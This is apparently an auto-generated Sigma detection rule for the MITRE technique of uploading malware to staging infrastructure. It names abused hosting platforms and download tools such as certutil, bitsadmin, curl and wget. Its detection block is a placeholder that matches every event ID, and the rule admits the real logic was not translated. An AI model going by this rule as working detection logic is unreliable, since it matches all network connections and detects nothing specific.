title: Upload Malware (T1608.001)
id: df00tech-t1608-001
status: experimental
description: "Adversaries may upload malware to third-party or adversary-controlled infrastructure to make it accessible during targeting. This includes placing payloads on compromised or purchased web servers, abusing public file-sharing services (Discord CDN, Pastebin, Dropbox, Google Drive), hosting on the InterPlanetary File System (IPFS) to resist takedowns, embedding in blockchain smart contracts, or backdooring software packages uploaded to repositories such as PyPI, NPM, Docker Hub, and GitHub. Detection of this PRE-attack technique occurs primarily on the victim side — when endpoints retrieve the staged malware — rather than at the point of upload. Detection strategies focus on network and file telemetry identifying executable content downloads from suspicious hosting platforms, abnormal use of download LOLBins, and package manager installs of typosquatted or newly-published packages."
references:
  - https://attack.mitre.org/techniques/T1608/001/
  - https://df00tech.com/detections/T1608.001
author: df00tech
date: 2026/03/13
tags:
  - attack.t1608.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: network_connection
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Software developers and researchers legitimately accessing IPFS gateways to retrieve decentralized content or test IPFS-hosted applications
  - "IT administrators using certutil.exe or bitsadmin.exe for legitimate software distribution, update delivery, or certificate operations"
  - "Users downloading legitimate installers from file-sharing platforms (Discord attachments shared in dev communities, transfer.sh for ops file sharing)"
  - CI/CD pipeline agents using curl or wget to fetch build artifacts or bootstrap scripts from GitHub raw content URLs
  - Browser-initiated downloads of legitimate software from sites that share infrastructure with abused platforms
level: medium